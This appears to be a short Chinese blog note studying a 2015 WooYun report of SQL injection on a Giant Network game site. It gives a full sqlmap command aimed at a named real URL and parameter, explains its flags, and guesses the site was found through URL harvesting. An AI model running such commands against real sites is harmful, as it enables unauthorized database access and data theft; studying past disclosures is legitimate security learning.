SQL漏洞分析 —— 乌云编号(141226)

0x00 说明

时间:

2015-09-15 09:57:00

内容:

巨人网络某站SQL注入(可读全库)

详细:

这里写图片描述

0x01 学习

挖掘工具:

SQLMAP

使用指令:

sqlmap.py -u "http://act.zt2.ztgame.com/haoshengyin/works.php?server=&text=s" -p text -v 3

-p text :指定内容为“text”

-v 3 debug内容等级为3

思考:

这个网址是如何找到的???

可能:

URL采集得到的。

猜你喜欢

转载自blog.csdn.net/qq_36869808/article/details/80157834